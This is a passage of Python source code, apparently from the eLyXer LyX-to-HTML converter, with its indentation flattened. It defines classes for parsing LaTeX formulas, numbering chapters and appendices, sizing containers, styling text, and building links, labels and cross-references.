"Set the self-closing tag, no contents (as in <hr/>)."
self.output = TaggedOutput().settag(tag, empty = True)
return self
class FormulaConstant(Constant):
"A constant string in a formula"
def __init__(self, string):
"Set the constant string"
Constant.__init__(self, string)
self.original = string
self.size = 1
self.type = None
def computesize(self):
"Compute the size of the constant: always 1."
return self.size
def clone(self):
"Return a copy of itself."
return FormulaConstant(self.original)
def __unicode__(self):
"Return a printable representation."
return 'Formula constant: ' + self.string
if sys.version_info >= (3, 0):
__str__ = __unicode__
class RawText(FormulaBit):
"A bit of text inside a formula"
def detect(self, pos):
"Detect a bit of raw text"
return pos.current().isalpha()
def parsebit(self, pos):
"Parse alphabetic text"
alpha = pos.globalpha()
self.add(FormulaConstant(alpha))
self.type = 'alpha'
class FormulaSymbol(FormulaBit):
"A symbol inside a formula"
modified = FormulaConfig.modified
unmodified = FormulaConfig.unmodified['characters']
def detect(self, pos):
"Detect a symbol"
if pos.current() in FormulaSymbol.unmodified:
return True
if pos.current() in FormulaSymbol.modified:
return True
return False
def parsebit(self, pos):
"Parse the symbol"
if pos.current() in FormulaSymbol.unmodified:
self.addsymbol(pos.current(), pos)
return
if pos.current() in FormulaSymbol.modified:
self.addsymbol(FormulaSymbol.modified[pos.current()], pos)
return
Trace.error('Symbol ' + pos.current() + ' not found')
def addsymbol(self, symbol, pos):
"Add a symbol"
self.skiporiginal(pos.current(), pos)
self.contents.append(FormulaConstant(symbol))
class FormulaNumber(FormulaBit):
"A string of digits in a formula"
def detect(self, pos):
"Detect a digit"
return pos.current().isdigit()
def parsebit(self, pos):
"Parse a bunch of digits"
digits = pos.glob(lambda: pos.current().isdigit())
self.add(FormulaConstant(digits))
self.type = 'number'
class Comment(FormulaBit):
"A LaTeX comment: % to the end of the line."
start = FormulaConfig.starts['comment']
def detect(self, pos):
"Detect the %."
return pos.current() == self.start
def parsebit(self, pos):
"Parse to the end of the line."
self.original += pos.globincluding('\n')
class WhiteSpace(FormulaBit):
"Some white space inside a formula."
def detect(self, pos):
"Detect the white space."
return pos.current().isspace()
def parsebit(self, pos):
"Parse all whitespace."
self.original += pos.skipspace()
def __unicode__(self):
"Return a printable representation."
return 'Whitespace: *' + self.original + '*'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Bracket(FormulaBit):
"A {} bracket inside a formula"
start = FormulaConfig.starts['bracket']
ending = FormulaConfig.endings['bracket']
def __init__(self):
"Create a (possibly literal) new bracket"
FormulaBit.__init__(self)
self.inner = None
def detect(self, pos):
"Detect the start of a bracket"
return pos.checkfor(self.start)
def parsebit(self, pos):
"Parse the bracket"
self.parsecomplete(pos, self.innerformula)
return self
def parsetext(self, pos):
"Parse a text bracket"
self.parsecomplete(pos, self.innertext)
return self
def parseliteral(self, pos):
"Parse a literal bracket"
self.parsecomplete(pos, self.innerliteral)
return self
def parsecomplete(self, pos, innerparser):
"Parse the start and end marks"
if not pos.checkfor(self.start):
Trace.error('Bracket should start with ' + self.start + ' at ' + pos.identifier())
return None
self.skiporiginal(self.start, pos)
pos.pushending(self.ending)
innerparser(pos)
self.original += pos.popending(self.ending)
self.computesize()
def innerformula(self, pos):
"Parse a whole formula inside the bracket"
while not pos.finished():
self.add(self.factory.parseany(pos))
def innertext(self, pos):
"Parse some text inside the bracket, following textual rules."
specialchars = list(FormulaConfig.symbolfunctions.keys())
specialchars.append(FormulaConfig.starts['command'])
specialchars.append(FormulaConfig.starts['bracket'])
specialchars.append(Comment.start)
while not pos.finished():
if pos.current() in specialchars:
self.add(self.factory.parseany(pos))
if pos.checkskip(' '):
self.original += ' '
else:
self.add(FormulaConstant(pos.skipcurrent()))
def innerliteral(self, pos):
"Parse a literal inside the bracket, which does not generate HTML."
self.literal = ''
while not pos.finished() and not pos.current() == self.ending:
if pos.current() == self.start:
self.parseliteral(pos)
else:
self.literal += pos.skipcurrent()
self.original += self.literal
class SquareBracket(Bracket):
"A [] bracket inside a formula"
start = FormulaConfig.starts['squarebracket']
ending = FormulaConfig.endings['squarebracket']
def clone(self):
"Return a new square bracket with the same contents."
bracket = SquareBracket()
bracket.contents = self.contents
return bracket
class MathsProcessor(object):
"A processor for a maths construction inside the FormulaProcessor."
def process(self, contents, index):
"Process an element inside a formula."
Trace.error('Unimplemented process() in ' + unicode(self))
def __unicode__(self):
"Return a printable description."
return 'Maths processor ' + self.__class__.__name__
if sys.version_info >= (3, 0):
__str__ = __unicode__
class FormulaProcessor(object):
"A processor specifically for formulas."
processors = []
def process(self, bit):
"Process the contents of every formula bit, recursively."
self.processcontents(bit)
self.processinsides(bit)
self.traversewhole(bit)
def processcontents(self, bit):
"Process the contents of a formula bit."
if not isinstance(bit, FormulaBit):
return
bit.process()
for element in bit.contents:
self.processcontents(element)
def processinsides(self, bit):
"Process the insides (limits, brackets) in a formula bit."
if not isinstance(bit, FormulaBit):
return
for index, element in enumerate(bit.contents):
for processor in self.processors:
processor.process(bit.contents, index)
# continue with recursive processing
self.processinsides(element)
def traversewhole(self, formula):
"Traverse over the contents to alter variables and space units."
last = None
for bit, contents in self.traverse(formula):
if bit.type == 'alpha':
self.italicize(bit, contents)
elif bit.type == 'font' and last and last.type == 'number':
bit.contents.insert(0, FormulaConstant(u' '))
last = bit
def traverse(self, bit):
"Traverse a formula and yield a flattened structure of (bit, list) pairs."
for element in bit.contents:
if hasattr(element, 'type') and element.type:
yield (element, bit.contents)
elif isinstance(element, FormulaBit):
for pair in self.traverse(element):
yield pair
def italicize(self, bit, contents):
"Italicize the given bit of text."
index = contents.index(bit)
contents[index] = TaggedBit().complete([bit], 'i')
class Formula(Container):
"A LaTeX formula"
def __init__(self):
self.parser = FormulaParser()
self.output = TaggedOutput().settag('span class="formula"')
def process(self):
"Convert the formula to tags"
if self.header[0] == 'inline':
DocumentParameters.displaymode = False
else:
DocumentParameters.displaymode = True
self.output.settag('div class="formula"', True)
if Options.jsmath:
self.jsmath()
elif Options.mathjax:
self.mathjax()
elif Options.googlecharts:
self.googlecharts()
else:
self.classic()
def jsmath(self):
"Make the contents for jsMath."
if self.header[0] != 'inline':
self.output = TaggedOutput().settag('div class="math"')
else:
self.output = TaggedOutput().settag('span class="math"')
self.contents = [Constant(self.parsed)]
def mathjax(self):
"Make the contents for MathJax."
self.output.tag = 'span class="MathJax_Preview"'
tag = 'script type="math/tex'
if self.header[0] != 'inline':
tag += ';mode=display'
self.contents = [TaggedText().constant(self.parsed, tag + '"', True)]
def googlecharts(self):
"Make the contents using Google Charts http://code.google.com/apis/chart/."
url = FormulaConfig.urls['googlecharts'] + quote_plus(self.parsed)
img = '<img class="chart" src="' + url + '" alt="' + self.parsed + '"/>'
self.contents = [Constant(img)]
def classic(self):
"Make the contents using classic output generation with XHTML and CSS."
whole = FormulaFactory().parseformula(self.parsed)
FormulaProcessor().process(whole)
whole.parent = self
self.contents = [whole]
def parse(self, pos):
"Parse using a parse position instead of self.parser."
if pos.checkskip('$$'):
self.parsedollarblock(pos)
elif pos.checkskip('$'):
self.parsedollarinline(pos)
elif pos.checkskip('\\('):
self.parseinlineto(pos, '\\)')
elif pos.checkskip('\\['):
self.parseblockto(pos, '\\]')
else:
pos.error('Unparseable formula')
self.process()
return self
def parsedollarinline(self, pos):
"Parse a $...$ formula."
self.header = ['inline']
self.parsedollar(pos)
def parsedollarblock(self, pos):
"Parse a $$...$$ formula."
self.header = ['block']
self.parsedollar(pos)
if not pos.checkskip('$'):
pos.error('Formula should be $$...$$, but last $ is missing.')
def parsedollar(self, pos):
"Parse to the next $."
pos.pushending('$')
self.parsed = pos.globexcluding('$')
pos.popending('$')
def parseinlineto(self, pos, limit):
"Parse a \\(...\\) formula."
self.header = ['inline']
self.parseupto(pos, limit)
def parseblockto(self, pos, limit):
"Parse a \\[...\\] formula."
self.header = ['block']
self.parseupto(pos, limit)
def parseupto(self, pos, limit):
"Parse a formula that ends with the given command."
pos.pushending(limit)
self.parsed = pos.glob(lambda: True)
pos.popending(limit)
def __unicode__(self):
"Return a printable representation."
if self.partkey and self.partkey.number:
return 'Formula (' + self.partkey.number + ')'
return 'Unnumbered formula'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class WholeFormula(FormulaBit):
"Parse a whole formula"
def detect(self, pos):
"Not outside the formula is enough."
return not pos.finished()
def parsebit(self, pos):
"Parse with any formula bit"
while not pos.finished():
self.add(self.factory.parseany(pos))
class FormulaFactory(object):
"Construct bits of formula"
# bit types will be appended later
types = [FormulaSymbol, RawText, FormulaNumber, Bracket, Comment, WhiteSpace]
skippedtypes = [Comment, WhiteSpace]
defining = False
def __init__(self):
"Initialize the map of instances."
self.instances = dict()
def detecttype(self, type, pos):
"Detect a bit of a given type."
if pos.finished():
return False
return self.instance(type).detect(pos)
def instance(self, type):
"Get an instance of the given type."
if not type in self.instances or not self.instances[type]:
self.instances[type] = self.create(type)
return self.instances[type]
def create(self, type):
"Create a new formula bit of the given type."
return Cloner.create(type).setfactory(self)
def clearskipped(self, pos):
"Clear any skipped types."
while not pos.finished():
if not self.skipany(pos):
return
return
def skipany(self, pos):
"Skip any skipped types."
for type in self.skippedtypes:
if self.instance(type).detect(pos):
return self.parsetype(type, pos)
return None
def parseany(self, pos):
"Parse any formula bit at the current location."
for type in self.types + self.skippedtypes:
if self.detecttype(type, pos):
return self.parsetype(type, pos)
Trace.error('Unrecognized formula at ' + pos.identifier())
return FormulaConstant(pos.skipcurrent())
def parsetype(self, type, pos):
"Parse the given type and return it."
bit = self.instance(type)
self.instances[type] = None
returnedbit = bit.parsebit(pos)
if returnedbit:
return returnedbit.setfactory(self)
return bit
def parseformula(self, formula):
"Parse a string of text that contains a whole formula."
pos = TextPosition(formula)
whole = self.create(WholeFormula)
if whole.detect(pos):
whole.parsebit(pos)
return whole
# no formula found
if not pos.finished():
Trace.error('Unknown formula at: ' + pos.identifier())
whole.add(TaggedBit().constant(formula, 'span class="unknown"'))
return whole
class Translator(object):
"Reads the configuration file and tries to find a translation."
"Otherwise falls back to the messages in the config file."
instance = None
def translate(cls, key):
"Get the translated message for a key."
return cls.instance.getmessage(key)
translate = classmethod(translate)
def __init__(self):
self.translation = None
self.first = True
def findtranslation(self):
"Find the translation for the document language."
self.langcodes = None
if not DocumentParameters.language:
Trace.error('No language in document')
return
if not DocumentParameters.language in TranslationConfig.languages:
Trace.error('Unknown language ' + DocumentParameters.language)
return
if TranslationConfig.languages[DocumentParameters.language] == 'en':
return
langcodes = [TranslationConfig.languages[DocumentParameters.language]]
try:
self.translation = gettext.translation('elyxer', None, langcodes)
except IOError:
Trace.error('No translation for ' + unicode(langcodes))
def getmessage(self, key):
"Get the translated message for the given key."
if self.first:
self.findtranslation()
self.first = False
message = self.getuntranslated(key)
if not self.translation:
return message
try:
message = self.translation.ugettext(message)
except IOError:
pass
return message
def getuntranslated(self, key):
"Get the untranslated message."
if not key in TranslationConfig.constants:
Trace.error('Cannot translate ' + key)
return key
return TranslationConfig.constants[key]
Translator.instance = Translator()
class NumberCounter(object):
"A counter for numbers (by default)."
"The type can be changed to return letters, roman numbers..."
name = None
value = None
mode = None
master = None
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
symbols = NumberingConfig.sequence['symbols']
romannumerals = [
('M', 1000), ('CM', 900), ('D', 500), ('CD', 400), ('C', 100),
('XC', 90), ('L', 50), ('XL', 40), ('X', 10), ('IX', 9), ('V', 5),
('IV', 4), ('I', 1)
]
def __init__(self, name):
"Give a name to the counter."
self.name = name
def setmode(self, mode):
"Set the counter mode. Can be changed at runtime."
self.mode = mode
return self
def init(self, value):
"Set an initial value."
self.value = value
def gettext(self):
"Get the next value as a text string."
return unicode(self.value)
def getletter(self):
"Get the next value as a letter."
return self.getsequence(self.letters)
def getsymbol(self):
"Get the next value as a symbol."
return self.getsequence(self.symbols)
def getsequence(self, sequence):
"Get the next value from elyxer.a sequence."
return sequence[(self.value - 1) % len(sequence)]
def getroman(self):
"Get the next value as a roman number."
result = ''
number = self.value
for numeral, value in self.romannumerals:
if number >= value:
result += numeral * (number / value)
number = number % value
return result
def getvalue(self):
"Get the current value as configured in the current mode."
if not self.mode or self.mode in ['text', '1']:
return self.gettext()
if self.mode == 'A':
return self.getletter()
if self.mode == 'a':
return self.getletter().lower()
if self.mode == 'I':
return self.getroman()
if self.mode == '*':
return self.getsymbol()
Trace.error('Unknown counter mode ' + self.mode)
return self.gettext()
def getnext(self):
"Increase the current value and get the next value as configured."
if not self.value:
self.value = 0
self.value += 1
return self.getvalue()
def reset(self):
"Reset the counter."
self.value = 0
def __unicode__(self):
"Return a printable representation."
result = 'Counter ' + self.name
if self.mode:
result += ' in mode ' + self.mode
return result
if sys.version_info >= (3, 0):
__str__ = __unicode__
class DependentCounter(NumberCounter):
"A counter which depends on another one (the master)."
def setmaster(self, master):
"Set the master counter."
self.master = master
self.last = self.master.getvalue()
return self
def getnext(self):
"Increase or, if the master counter has changed, restart."
if self.last != self.master.getvalue():
self.reset()
value = NumberCounter.getnext(self)
self.last = self.master.getvalue()
return value
def getvalue(self):
"Get the value of the combined counter: master.dependent."
return self.master.getvalue() + '.' + NumberCounter.getvalue(self)
class NumberGenerator(object):
"A number generator for unique sequences and hierarchical structures. Used in:"
" * ordered part numbers: Chapter 3, Section 5.3."
" * unique part numbers: Footnote 15, Bibliography cite [15]."
" * chaptered part numbers: Figure 3.15, Equation (8.3)."
" * unique roman part numbers: Part I, Book IV."
chaptered = None
generator = None
romanlayouts = [x.lower() for x in NumberingConfig.layouts['roman']]
orderedlayouts = [x.lower() for x in NumberingConfig.layouts['ordered']]
counters = dict()
appendix = None
def deasterisk(self, type):
"Remove the possible asterisk in a layout type."
return type.replace('*', '')
def isunique(self, type):
"Find out if the layout type corresponds to a unique part."
return self.isroman(type)
def isroman(self, type):
"Find out if the layout type should have roman numeration."
return self.deasterisk(type).lower() in self.romanlayouts
def isinordered(self, type):
"Find out if the layout type corresponds to an (un)ordered part."
return self.deasterisk(type).lower() in self.orderedlayouts
def isnumbered(self, type):
"Find out if the type for a layout corresponds to a numbered layout."
if '*' in type:
return False
if self.isroman(type):
return True
if not self.isinordered(type):
return False
if self.getlevel(type) > DocumentParameters.maxdepth:
return False
return True
def isunordered(self, type):
"Find out if the type contains an asterisk, basically."
return '*' in type
def getlevel(self, type):
"Get the level that corresponds to a layout type."
if self.isunique(type):
return 0
if not self.isinordered(type):
Trace.error('Unknown layout type ' + type)
return 0
type = self.deasterisk(type).lower()
level = self.orderedlayouts.index(type) + 1
return level - DocumentParameters.startinglevel
def getparttype(self, type):
"Obtain the type for the part: without the asterisk, "
"and switched to Appendix if necessary."
if NumberGenerator.appendix and self.getlevel(type) == 1:
return 'Appendix'
return self.deasterisk(type)
def generate(self, type):
"Generate a number for a layout type."
"Unique part types such as Part or Book generate roman numbers: Part I."
"Ordered part types return dot-separated tuples: Chapter 5, Subsection 2.3.5."
"Everything else generates unique numbers: Bibliography [1]."
"Each invocation results in a new number."
return self.getcounter(type).getnext()
def getcounter(self, type):
"Get the counter for the given type."
type = type.lower()
if not type in self.counters:
self.counters[type] = self.create(type)
return self.counters[type]
def create(self, type):
"Create a counter for the given type."
if self.isnumbered(type) and self.getlevel(type) > 1:
index = self.orderedlayouts.index(type)
above = self.orderedlayouts[index - 1]
master = self.getcounter(above)
return self.createdependent(type, master)
counter = NumberCounter(type)
if self.isroman(type):
counter.setmode('I')
return counter
def getdependentcounter(self, type, master):
"Get (or create) a counter of the given type that depends on another."
if not type in self.counters or not self.counters[type].master:
self.counters[type] = self.createdependent(type, master)
return self.counters[type]
def createdependent(self, type, master):
"Create a dependent counter given the master."
return DependentCounter(type).setmaster(master)
def startappendix(self):
"Start appendices here."
firsttype = self.orderedlayouts[DocumentParameters.startinglevel]
counter = self.getcounter(firsttype)
counter.setmode('A').reset()
NumberGenerator.appendix = True
class ChapteredGenerator(NumberGenerator):
"Generate chaptered numbers, as in Chapter.Number."
"Used in equations, figures: Equation (5.3), figure 8.15."
def generate(self, type):
"Generate a number which goes with first-level numbers (chapters). "
"For the article classes a unique number is generated."
if DocumentParameters.startinglevel > 0:
return NumberGenerator.generator.generate(type)
chapter = self.getcounter('Chapter')
return self.getdependentcounter(type, chapter).getnext()
NumberGenerator.chaptered = ChapteredGenerator()
NumberGenerator.generator = NumberGenerator()
class ContainerSize(object):
"The size of a container."
width = None
height = None
maxwidth = None
maxheight = None
scale = None
def set(self, width = None, height = None):
"Set the proper size with width and height."
self.setvalue('width', width)
self.setvalue('height', height)
return self
def setmax(self, maxwidth = None, maxheight = None):
"Set max width and/or height."
self.setvalue('maxwidth', maxwidth)
self.setvalue('maxheight', maxheight)
return self
def readparameters(self, container):
"Read some size parameters off a container."
self.setparameter(container, 'width')
self.setparameter(container, 'height')
self.setparameter(container, 'scale')
self.checkvalidheight(container)
return self
def setparameter(self, container, name):
"Read a size parameter off a container, and set it if present."
value = container.getparameter(name)
self.setvalue(name, value)
def setvalue(self, name, value):
"Set the value of a parameter name, only if it's valid."
value = self.processparameter(value)
if value:
setattr(self, name, value)
def checkvalidheight(self, container):
"Check if the height parameter is valid; otherwise erase it."
heightspecial = container.getparameter('height_special')
if self.height and self.extractnumber(self.height) == '1' and heightspecial == 'totalheight':
self.height = None
def processparameter(self, value):
"Do the full processing on a parameter."
if not value:
return None
if self.extractnumber(value) == '0':
return None
for ignored in StyleConfig.size['ignoredtexts']:
if ignored in value:
value = value.replace(ignored, '')
return value
def extractnumber(self, text):
"Extract the first number in the given text."
result = ''
decimal = False
for char in text:
if char.isdigit():
result += char
elif char == '.' and not decimal:
result += char
decimal = True
else:
return result
return result
def checkimage(self, width, height):
"Check image dimensions, set them if possible."
if width:
self.maxwidth = unicode(width) + 'px'
if self.scale and not self.width:
self.width = self.scalevalue(width)
if height:
self.maxheight = unicode(height) + 'px'
if self.scale and not self.height:
self.height = self.scalevalue(height)
if self.width and not self.height:
self.height = 'auto'
if self.height and not self.width:
self.width = 'auto'
def scalevalue(self, value):
"Scale the value according to the image scale and return it as unicode."
scaled = value * int(self.scale) / 100
return unicode(int(scaled)) + 'px'
def removepercentwidth(self):
"Remove percent width if present, to set it at the figure level."
if not self.width:
return None
if not '%' in self.width:
return None
width = self.width
self.width = None
if self.height == 'auto':
self.height = None
return width
def addstyle(self, container):
"Add the proper style attribute to the output tag."
if not isinstance(container.output, TaggedOutput):
Trace.error('No tag to add style, in ' + unicode(container))
if not self.width and not self.height and not self.maxwidth and not self.maxheight:
# nothing to see here; move along
return
tag = ' style="'
tag += self.styleparameter('width')
tag += self.styleparameter('maxwidth')
tag += self.styleparameter('height')
tag += self.styleparameter('maxheight')
if tag[-1] == ' ':
tag = tag[:-1]
tag += '"'
container.output.tag += tag
def styleparameter(self, name):
"Get the style for a single parameter."
value = getattr(self, name)
if value:
return name.replace('max', 'max-') + ': ' + value + '; '
return ''
class QuoteContainer(Container):
"A container for a pretty quote"
def __init__(self):
self.parser = BoundedParser()
self.output = FixedOutput()
def process(self):
"Process contents"
self.type = self.header[2]
if not self.type in StyleConfig.quotes:
Trace.error('Quote type ' + self.type + ' not found')
self.html = ['"']
return
self.html = [StyleConfig.quotes[self.type]]
class LyXLine(Container):
"A Lyx line"
def __init__(self):
self.parser = LoneCommand()
self.output = FixedOutput()
def process(self):
self.html = ['<hr class="line" />']
class EmphaticText(TaggedText):
"Text with emphatic mode"
def process(self):
self.output.tag = 'i'
class ShapedText(TaggedText):
"Text shaped (italic, slanted)"
def process(self):
self.type = self.header[1]
if not self.type in TagConfig.shaped:
Trace.error('Unrecognized shape ' + self.header[1])
self.output.tag = 'span'
return
self.output.tag = TagConfig.shaped[self.type]
class VersalitasText(TaggedText):
"Text in versalitas"
def process(self):
self.output.tag = 'span class="versalitas"'
class ColorText(TaggedText):
"Colored text"
def process(self):
self.color = self.header[1]
self.output.tag = 'span class="' + self.color + '"'
class SizeText(TaggedText):
"Sized text"
def process(self):
self.size = self.header[1]
self.output.tag = 'span class="' + self.size + '"'
class BoldText(TaggedText):
"Bold text"
def process(self):
self.output.tag = 'b'
class TextFamily(TaggedText):
"A bit of text from elyxer.a different family"
def process(self):
"Parse the type of family"
self.type = self.header[1]
if not self.type in TagConfig.family:
Trace.error('Unrecognized family ' + type)
self.output.tag = 'span'
return
self.output.tag = TagConfig.family[self.type]
class Hfill(TaggedText):
"Horizontall fill"
def process(self):
self.output.tag = 'span class="hfill"'
class BarredText(TaggedText):
"Text with a bar somewhere"
def process(self):
"Parse the type of bar"
self.type = self.header[1]
if not self.type in TagConfig.barred:
Trace.error('Unknown bar type ' + self.type)
self.output.tag = 'span'
return
self.output.tag = TagConfig.barred[self.type]
class LangLine(TaggedText):
"A line with language information"
def process(self):
"Only generate a span with lang info when the language is recognized."
lang = self.header[1]
if not lang in TranslationConfig.languages:
self.output = ContentsOutput()
return
isolang = TranslationConfig.languages[lang]
self.output = TaggedOutput().settag('span lang="' + isolang + '"', False)
class InsetLength(BlackBox):
"A length measure inside an inset."
def process(self):
self.length = self.header[1]
class Space(Container):
"A space of several types"
def __init__(self):
self.parser = InsetParser()
self.output = FixedOutput()
def process(self):
self.type = self.header[2]
if self.type not in StyleConfig.hspaces:
Trace.error('Unknown space type ' + self.type)
self.html = [' ']
return
self.html = [StyleConfig.hspaces[self.type]]
length = self.getlength()
if not length:
return
self.output = TaggedOutput().settag('span class="hspace"', False)
ContainerSize().set(length).addstyle(self)
def getlength(self):
"Get the space length from elyxer.the contents or parameters."
if len(self.contents) == 0 or not isinstance(self.contents[0], InsetLength):
return None
return self.contents[0].length
class VerticalSpace(Container):
"An inset that contains a vertical space."
def __init__(self):
self.parser = InsetParser()
self.output = FixedOutput()
def process(self):
"Set the correct tag"
self.type = self.header[2]
if self.type not in StyleConfig.vspaces:
self.output = TaggedOutput().settag('div class="vspace" style="height: ' + self.type + ';"', True)
return
self.html = [StyleConfig.vspaces[self.type]]
class Align(Container):
"Bit of aligned text"
def __init__(self):
self.parser = ExcludingParser()
self.output = TaggedOutput().setbreaklines(True)
def process(self):
self.output.tag = 'div class="' + self.header[1] + '"'
class Newline(Container):
"A newline"
def __init__(self):
self.parser = LoneCommand()
self.output = FixedOutput()
def process(self):
"Process contents"
self.html = ['<br/>\n']
class NewPage(Newline):
"A new page"
def process(self):
"Process contents"
self.html = ['<p><br/>\n</p>\n']
class Separator(Container):
"A separator string which is not extracted by extracttext()."
def __init__(self, constant):
self.output = FixedOutput()
self.contents = []
self.html = [constant]
class StrikeOut(TaggedText):
"Striken out text."
def process(self):
"Set the output tag to strike."
self.output.tag = 'strike'
class StartAppendix(BlackBox):
"Mark to start an appendix here."
"From this point on, all chapters become appendices."
def process(self):
"Activate the special numbering scheme for appendices, using letters."
NumberGenerator.generator.startappendix()
class Link(Container):
"A link to another part of the document"
anchor = None
url = None
type = None
page = None
target = None
destination = None
title = None
def __init__(self):
"Initialize the link, add target if configured."
self.contents = []
self.parser = InsetParser()
self.output = LinkOutput()
if Options.target:
self.target = Options.target
def complete(self, text, anchor = None, url = None, type = None, title = None):
"Complete the link."
self.contents = [Constant(text)]
if anchor:
self.anchor = anchor
if url:
self.url = url
if type:
self.type = type
if title:
self.title = title
return self
def computedestination(self):
"Use the destination link to fill in the destination URL."
if not self.destination:
return
self.url = ''
if self.destination.anchor:
self.url = '#' + self.destination.anchor
if self.destination.page:
self.url = self.destination.page + self.url
def setmutualdestination(self, destination):
"Set another link as destination, and set its destination to this one."
self.destination = destination
destination.destination = self
def __unicode__(self):
"Return a printable representation."
result = 'Link'
if self.anchor:
result += ' #' + self.anchor
if self.url:
result += ' to ' + self.url
return result
if sys.version_info >= (3, 0):
__str__ = __unicode__
class URL(Link):
"A clickable URL"
def process(self):
"Read URL from elyxer.parameters"
target = self.escape(self.getparameter('target'))
self.url = target
type = self.getparameter('type')
if type:
self.url = self.escape(type) + target
name = self.getparameter('name')
if not name:
name = target
self.contents = [Constant(name)]
class FlexURL(URL):
"A flexible URL"
def process(self):
"Read URL from elyxer.contents"
self.url = self.extracttext()
class LinkOutput(ContainerOutput):
"A link pointing to some destination"
"Or an anchor (destination)"
def gethtml(self, link):
"Get the HTML code for the link"
type = link.__class__.__name__
if link.type:
type = link.type
tag = 'a class="' + type + '"'
if link.anchor:
tag += ' name="' + link.anchor + '"'
if link.destination:
link.computedestination()
if link.url:
tag += ' href="' + link.url + '"'
if link.target:
tag += ' target="' + link.target + '"'
if link.title:
tag += ' title="' + link.title + '"'
return TaggedOutput().settag(tag).gethtml(link)
class Postprocessor(object):
"Postprocess a container keeping some context"
stages = []
def __init__(self):
self.stages = StageDict(Postprocessor.stages, self)
self.current = None
self.last = None
def postprocess(self, next):
"Postprocess a container and its contents."
self.postrecursive(self.current)
result = self.postcurrent(next)
self.last = self.current
self.current = next
return result
def postrecursive(self, container):
"Postprocess the container contents recursively"
if not hasattr(container, 'contents'):
return
if len(container.contents) == 0:
return
if hasattr(container, 'postprocess'):
if not container.postprocess:
return
postprocessor = Postprocessor()
contents = []
for element in container.contents:
post = postprocessor.postprocess(element)
if post:
contents.append(post)
# two rounds to empty the pipeline
for i in range(2):
post = postprocessor.postprocess(None)
if post:
contents.append(post)
container.contents = contents
def postcurrent(self, next):
"Postprocess the current element taking into account next and last."
stage = self.stages.getstage(self.current)
if not stage:
return self.current
return stage.postprocess(self.last, self.current, next)
class StageDict(object):
"A dictionary of stages corresponding to classes"
def __init__(self, classes, postprocessor):
"Instantiate an element from elyxer.each class and store as a dictionary"
instances = self.instantiate(classes, postprocessor)
self.stagedict = dict([(x.processedclass, x) for x in instances])
def instantiate(self, classes, postprocessor):
"Instantiate an element from elyxer.each class"
stages = [x.__new__(x) for x in classes]
for element in stages:
element.__init__()
element.postprocessor = postprocessor
return stages
def getstage(self, element):
"Get the stage for a given element, if the type is in the dict"
if not element.__class__ in self.stagedict:
return None
return self.stagedict[element.__class__]
class Label(Link):
"A label to be referenced"
names = dict()
lastlayout = None
def __init__(self):
Link.__init__(self)
self.lastnumbered = None
def process(self):
"Process a label container."
key = self.getparameter('name')
self.create(' ', key)
self.lastnumbered = Label.lastlayout
def create(self, text, key, type = 'Label'):
"Create the label for a given key."
self.key = key
self.complete(text, anchor = key, type = type)
Label.names[key] = self
if key in Reference.references:
for reference in Reference.references[key]:
reference.destination = self
return self
def findpartkey(self):
"Get the part key for the latest numbered container seen."
numbered = self.numbered(self)
if numbered and numbered.partkey:
return numbered.partkey
return ''
def numbered(self, container):
"Get the numbered container for the label."
if container.partkey:
return container
if not container.parent:
if self.lastnumbered:
return self.lastnumbered
return None
return self.numbered(container.parent)
def __unicode__(self):
"Return a printable representation."
if not hasattr(self, 'key'):
return 'Unnamed label'
return 'Label ' + self.key
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Reference(Link):
"A reference to a label."
references = dict()
key = 'none'
def process(self):
"Read the reference and set the arrow."
self.key = self.getparameter('reference')
if self.key in Label.names:
self.direction = u'↑'
label = Label.names[self.key]
else:
self.direction = u'↓'
label = Label().complete(' ', self.key, 'preref')
self.destination = label
self.formatcontents()
if not self.key in Reference.references:
Reference.references[self.key] = []
Reference.references[self.key].append(self)
def formatcontents(self):
"Format the reference contents."
formatkey = self.getparameter('LatexCommand')
if not formatkey:
formatkey = 'ref'
self.formatted = u'↕'
if formatkey in StyleConfig.referenceformats:
self.formatted = StyleConfig.referenceformats[formatkey]
else:
Trace.error('Unknown reference format ' + formatkey)
self.replace(u'↕', self.direction)
self.replace('#', '1')
self.replace('on-page', Translator.translate('on-page'))
partkey = self.destination.findpartkey()
# only if partkey and partkey.number are not null, send partkey.number
self.replace('@', partkey and partkey.number)
self.replace(u'¶', partkey and partkey.tocentry)
if not '$' in self.formatted or not partkey or not partkey.titlecontents:
# there is a $ left, but it should go away on preprocessing
self.contents = [Constant(self.formatted)]
return
pieces = self.formatted.split('$')
self.contents = [Constant(pieces[0])]
for piece in pieces[1:]:
self.contents += partkey.titlecontents
self.contents.append(Constant(piece))
def replace(self, key, value):
"Replace a key in the format template with a value."
if not key in self.formatted:
return
if not value:
value = ''
self.formatted = self.formatted.replace(key, value)
def __unicode__(self):
"Return a printable representation."
return 'Reference ' + self.key
if sys.version_info >= (3, 0):
__str__ = __unicode__
class FormulaCommand(FormulaBit):
"A LaTeX command inside a formula"
types = []
start = FormulaConfig.starts['command']
commandmap = None
def detect(self, pos):
"Find the current command."
return pos.checkfor(FormulaCommand.start)
def parsebit(self, pos):
"Parse the command."
command = self.extractcommand(pos)
bit = self.parsewithcommand(command, pos)
if bit:
return bit
if command.startswith('\\up') or command.startswith('\\Up'):
upgreek = self.parseupgreek(command, pos)
if upgreek:
return upgreek
if not self.factory.defining:
Trace.error('Unknown command ' + command)
self.output = TaggedOutput().settag('span class="unknown"')
self.add(FormulaConstant(command))
return None
def parsewithcommand(self, command, pos):
"Parse the command type once we have the command."
for type in FormulaCommand.types:
if command in type.commandmap:
return self.parsecommandtype(command, type, pos)
return None
def parsecommandtype(self, command, type, pos):
"Parse a given command type."
bit = self.factory.create(type)
bit.setcommand(command)
returned = bit.parsebit(pos)
if returned:
return returned
return bit
def extractcommand(self, pos):
"Extract the command from elyxer.the current position."
if not pos.checkskip(FormulaCommand.start):
pos.error('Missing command start ' + FormulaCommand.start)
return
if pos.finished():
return self.emptycommand(pos)
if pos.current().isalpha():
# alpha command
command = FormulaCommand.start + pos.globalpha()
# skip mark of short command
pos.checkskip('*')
return command
# symbol command
return FormulaCommand.start + pos.skipcurrent()
def emptycommand(self, pos):
"""Check for an empty command: look for command disguised as ending.
Special case against '{ \\{ \\} }' situation."""
command = ''
if not pos.isout():
ending = pos.nextending()
if ending and pos.checkskip(ending):
command = ending
return FormulaCommand.start + command
def parseupgreek(self, command, pos):
"Parse the Greek \\up command.."
if len(command) < 4:
return None
